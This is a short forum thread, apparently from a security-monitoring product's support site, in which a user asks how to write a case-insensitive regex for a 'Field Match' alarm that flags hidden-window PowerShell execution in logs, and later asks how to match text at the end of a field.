What is the proper RegEX format for Field Match alarms? I'm trying to implement a very simple RegEx match for the word hidden, case insensitive. Normally this would just be /(hidden)/i but it doesn't seem to work in the Field Match alarm section
The filter for "hidden" or "Hidden" seems works fine, so i've narrowed the problem down to the RegEx match, not the alarm logic itself.
For context this is parsing PowerShell logs to look for PS execution trying to hide the window.
Hey Andy, thanks for the reply, I tried on the "D" character instead, no dice.
And the event:
Edit: After some fiddling, this worked. Thank you, how do I implement other other RegEx functions, like "ends with" for example, the traditional dollar sign after the text doesn't seem to work. Is there a standard format of RegEx that the field match is expecting?